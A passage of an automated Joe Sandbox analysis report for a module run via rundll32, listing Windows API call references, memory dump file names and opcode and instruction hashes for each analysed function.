                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 73e32524d3a122b234ad06882df88c1dad3ba5c38c7a396de6c544977fed9838
                                                                              • Instruction ID: a2102e56326476b24f25deaf80f2ce6e74ad040cd4a9d8612f0eae8e89a59c45
                                                                              • Opcode Fuzzy Hash: 73e32524d3a122b234ad06882df88c1dad3ba5c38c7a396de6c544977fed9838
                                                                              • Instruction Fuzzy Hash: ACC125627102C06BE7249A7CDC8476EB2C69BC432BF18867DE216CB3C6FB64EC458754
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 04638E38: GetCurrentThreadId.KERNEL32 ref: 04638E3B
                                                                              • GetTickCount.KERNEL32 ref: 046389E3
                                                                              • GetTickCount.KERNEL32 ref: 046389FB
                                                                              • GetCurrentThreadId.KERNEL32 ref: 04638A2A
                                                                              • GetTickCount.KERNEL32 ref: 04638A55
                                                                              • GetTickCount.KERNEL32 ref: 04638A8C
                                                                              • GetTickCount.KERNEL32 ref: 04638AB6
                                                                              • GetCurrentThreadId.KERNEL32 ref: 04638B26
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$CurrentThread
                                                                              • String ID:
                                                                              • API String ID: 3968769311-0
                                                                              • Opcode ID: 5c08a82f879b74723aa517f04222c622cd0f95d3aea439a1b2a319428d24e3c0
                                                                              • Instruction ID: 7fab531a0e54ca71d7f86f1c1dc210afb3f41e532e803b2e82e82332c5f24f90
                                                                              • Opcode Fuzzy Hash: 5c08a82f879b74723aa517f04222c622cd0f95d3aea439a1b2a319428d24e3c0
                                                                              • Instruction Fuzzy Hash: 19417F712083C19EE721FE7CC98439ABBD1AFA0356F14896CE4D987381FB75A8858752
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,04857788,00000000,?,04639AEA,?,?,04863B9C,04863B9C,?,?,04858C38,04640843,04857788), ref: 04639A65
                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,04857788,00000000,?,04639AEA,?,?,04863B9C,04863B9C,?,?,04858C38,04640843), ref: 04639A6B
                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,00000002,04857788,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,04857788,00000000,?,04639AEA,?,?,04863B9C), ref: 04639A86
                                                                              • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,04857788,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,04857788,00000000,?,04639AEA,?,?), ref: 04639A8C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandleWrite
                                                                              • String ID: Error$Runtime error at 00000000
                                                                              • API String ID: 3320372497-2970929446
                                                                              • Opcode ID: bbc495b04e9e24900b2c10b889da7d666f44045dcba19d61430c5e4dc5c18eac
                                                                              • Instruction ID: 3445cfc13b97c85248122829c6efc9afeac9a8a03e8561c3e6cb7a179da66f27
                                                                              • Opcode Fuzzy Hash: bbc495b04e9e24900b2c10b889da7d666f44045dcba19d61430c5e4dc5c18eac
                                                                              • Instruction Fuzzy Hash: 37F0F6906803C0B9FB21BB588D4AF59365C9B00B17F501B0AF165DA5C1F7ED78889A76
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetFileSize.KERNEL32(00000001,00000000,00000000,04653181,?,?,?,0465323B,00000000,04653255,?,00000000,80000000,00000001,00000000,00000003), ref: 04652FA1
                                                                              • CreateFileMappingW.KERNEL32(00000001,00000000,00000002,00000000,00000001,00000000,00000001,00000000,00000000,04653181,?,?,?,0465323B,00000000,04653255), ref: 04653037
                                                                              • MapViewOfFile.KERNEL32(000003EE,00000004,00000000,00000000,00000001,00000000,04653110,?,00000001,00000000,00000002,00000000,00000001,00000000,00000001,00000000), ref: 04653066
                                                                              • GetCurrentProcess.KERNEL32(00000104,00000000,046530F2,?,000003EE,00000004,00000000,00000000,00000001,00000000,04653110,?,00000001,00000000,00000002,00000000), ref: 0465308B
                                                                              • UnmapViewOfFile.KERNEL32(00000000,046530F9,?,000003EE,00000004,00000000,00000000,00000001,00000000,04653110,?,00000001,00000000,00000002,00000000,00000001), ref: 046530EC
                                                                                • Part of subcall function 04652D1C: GetLogicalDriveStringsW.KERNEL32(00000104,?,00000000,04652E4A,?,00000000,?,00000000,?,04653151,00000001,00000000,00000002,00000000,00000001,00000000), ref: 04652D59
                                                                                • Part of subcall function 04652D1C: QueryDosDeviceW.KERNEL32(?,?,00000104,00000104,?,00000000,04652E4A,?,00000000,?,00000000,?,04653151,00000001,00000000,00000002), ref: 04652D83
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: File$View$CreateCurrentDeviceDriveLogicalMappingProcessQuerySizeStringsUnmap
                                                                              • String ID:
                                                                              • API String ID: 435433801-0
                                                                              • Opcode ID: a790490ffd5c94e92b36087b063c8ba41910fe1ceb4b695b8e507a2c73470d7c
                                                                              • Instruction ID: 39b2ca5bb3a0fca8fd2f42a2fa9c901fadaf41098d993cc5b892d585a6cb3f1d
                                                                              • Opcode Fuzzy Hash: a790490ffd5c94e92b36087b063c8ba41910fe1ceb4b695b8e507a2c73470d7c
                                                                              • Instruction Fuzzy Hash: D3514C70A00249AFEF20EFA4CC95B9EB7B5EB49704F5045A9E904A73A0E7747E81CF54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 04636252
                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 04636258
                                                                              • GetStdHandle.KERNEL32(000000F4,046353A0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 04636277
                                                                              • WriteFile.KERNEL32(00000000,000000F4,046353A0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 0463627D
                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,046353A0,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 04636294
                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,046353A0,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 0463629A
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandleWrite
                                                                              • String ID:
                                                                              • API String ID: 3320372497-0
                                                                              • Opcode ID: 1982b620de516ca273794dd5a79f432c5a9532d34dcb7ef12641a9bbdb6cedc9
                                                                              • Instruction ID: cc3aa478d9dd5eafdfc794d9a6b513ff0f0865f5ab24620e37f9cf9d6876b031
                                                                              • Opcode Fuzzy Hash: 1982b620de516ca273794dd5a79f432c5a9532d34dcb7ef12641a9bbdb6cedc9
                                                                              • Instruction Fuzzy Hash: 4501C8A13083903DF510F7B8DD84F5B26CCCF1562EF100619B169D71D0EAA9AC0497B9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • EnumWindows.USER32(04816848,00000000), ref: 04816992
                                                                              • ShowWindow.USER32(?,00000000,04816848,00000000), ref: 048169D4
                                                                              • ShowOwnedPopups.USER32(00000000,?), ref: 04816A03
                                                                              • ShowWindow.USER32(?,00000005), ref: 04816A78
                                                                              • ShowOwnedPopups.USER32(00000000,?), ref: 04816AA7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Show$OwnedPopupsWindow$EnumWindows
                                                                              • String ID:
                                                                              • API String ID: 315437064-0
                                                                              • Opcode ID: 05fbb80ca3e0bcdddf95cb5d9a144afbbb29c207009b10c4bd0efef7d354ae0b
                                                                              • Instruction ID: d02d2addbfb4582ddc9a4f3c01a73f3ac9760c9d3f6c5d883e97953c16b3de0d
                                                                              • Opcode Fuzzy Hash: 05fbb80ca3e0bcdddf95cb5d9a144afbbb29c207009b10c4bd0efef7d354ae0b
                                                                              • Instruction Fuzzy Hash: 39413C30600B019FE721DA2CC484B6A73DAFB84319F054E2BE595D72A1E734B8D5DB42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • UnhookWindowsHookEx.USER32(00000000), ref: 04815A5A
                                                                              • SetEvent.KERNEL32(00000000), ref: 04815A86
                                                                              • GetCurrentThreadId.KERNEL32 ref: 04815A8B
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 04815AB4
                                                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 04815AC1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                                              • String ID:
                                                                              • API String ID: 2132507429-0
                                                                              • Opcode ID: bf89cb67a653355633545a988dee1374e8a7636e2df79451d409c1cef8d63c48
                                                                              • Instruction ID: 6f829d9be273a481dec0f16af469a76a62afc4a343f52b19a714d5256f6d6e4d
                                                                              • Opcode Fuzzy Hash: bf89cb67a653355633545a988dee1374e8a7636e2df79451d409c1cef8d63c48
                                                                              • Instruction Fuzzy Hash: 05016270155200EFEB40EB68D981B1933E8EBC4318F405E2BF555C71D0EA78B880CF96
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0463CBC9
                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0463CC27
                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0463CC84
                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0463CCB7
                                                                                • Part of subcall function 0463CB74: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0463CC35), ref: 0463CB8B
                                                                                • Part of subcall function 0463CB74: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0463CC35), ref: 0463CBA8
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$LanguagesPreferred$Language
                                                                              • String ID:
                                                                              • API String ID: 2255706666-0
                                                                              • Opcode ID: 5f8b28d9da5074ba87ff7083ab1fc04d8a6221fed732b2aaeddd93a1ea9b850c
                                                                              • Instruction ID: edcdb0acf4b6f6a0d27b70c4003944c8dad82b6ad774628c9cd53e75051c4b2d
                                                                              • Opcode Fuzzy Hash: 5f8b28d9da5074ba87ff7083ab1fc04d8a6221fed732b2aaeddd93a1ea9b850c
                                                                              • Instruction Fuzzy Hash: 22315071E0025EABDF10DFE8C884AAEB7B4FF15706F004569E951F7290EB75AA04CB54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetActiveWindow.USER32(?,?,048671C0,0481813C), ref: 048174C2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: ActiveWindow
                                                                              • String ID:
                                                                              • API String ID: 2558294473-0
                                                                              • Opcode ID: 5025ad2765444b72e5533e97589a94224af36d047306ebcf89fd9bf0c43377f2
                                                                              • Instruction ID: 31629f1292054e6a431d8f63508c641feb76db58ad29e96e1af4df33919fbb62
                                                                              • Opcode Fuzzy Hash: 5025ad2765444b72e5533e97589a94224af36d047306ebcf89fd9bf0c43377f2
                                                                              • Instruction Fuzzy Hash: 3031B4707002805BEB55FE6CC8C4BDA379A5F44308F444ABAAD06DF2AADA74FC84C765
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindow.USER32(?,00000004), ref: 0481685A
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 04816877
                                                                              • GetCurrentProcessId.KERNEL32(?,00000004), ref: 04816883
                                                                              • IsWindowVisible.USER32(?), ref: 048168DD
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Process$CurrentThreadVisible
                                                                              • String ID:
                                                                              • API String ID: 3926708836-0
                                                                              • Opcode ID: bd925d038154b3e6289e25fe58b5d93fda2f063e85b695ef3b1e864040738814
                                                                              • Instruction ID: 7620c319b1ff23b5e6def2fd1e83749e9bf98a839955040d94036731eb5d9dcf
                                                                              • Opcode Fuzzy Hash: bd925d038154b3e6289e25fe58b5d93fda2f063e85b695ef3b1e864040738814
                                                                              • Instruction Fuzzy Hash: 54314D75A10205DBEB50DFA9D8C4BAA73A8FB44314F044A7AE944E7351EB39FD008BA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • EnumWindows.USER32(04816534), ref: 04816625
                                                                              • GetWindow.USER32(00000003,00000003), ref: 0481663D
                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0481664A
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 04816689
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnumLongWindows
                                                                              • String ID:
                                                                              • API String ID: 4191631535-0
                                                                              • Opcode ID: b2b8659282ac86e44a25ec99f90b7c65b8437ce3fd897b989bfa4498a09fe261
                                                                              • Instruction ID: e444005880bd4c26db36986452134a0f9e4c0ef10f1bcee2cceeeec51dcd0700
                                                                              • Opcode Fuzzy Hash: b2b8659282ac86e44a25ec99f90b7c65b8437ce3fd897b989bfa4498a09fe261
                                                                              • Instruction Fuzzy Hash: 64117070705710AFEB50AB188884F9973D89B46728F144669FDD8EF2E1E774A840C766
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 04761D11
                                                                              • GetCurrentProcessId.KERNEL32(?,?,00000000,04819BD1,?,?,?,00000001,04817DAB), ref: 04761D1A
                                                                              • GlobalFindAtomW.KERNEL32(00000000), ref: 04761D2F
                                                                              • GetPropW.USER32(00000000,00000000), ref: 04761D46
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                              • String ID:
                                                                              • API String ID: 2582817389-0
                                                                              • Opcode ID: 209ccea09c22b164dff2d219e048f77f07c571c7c7b8796f702dee75f521888a
                                                                              • Instruction ID: f67bb6fd617d820163a1fffdae30a4568da050048b467aea3bc486828de08994
                                                                              • Opcode Fuzzy Hash: 209ccea09c22b164dff2d219e048f77f07c571c7c7b8796f702dee75f521888a
                                                                              • Instruction Fuzzy Hash: 95F03052310261ABAF20B6FA5C8882B328ECE442A93811935FD06D6214EA28AC4593F6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(NTDLL.DLL,NtQueryObject,?,00000000), ref: 04652E7E
                                                                                • Part of subcall function 04644E00: GetProcAddress.KERNEL32(?,?), ref: 04644E2A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
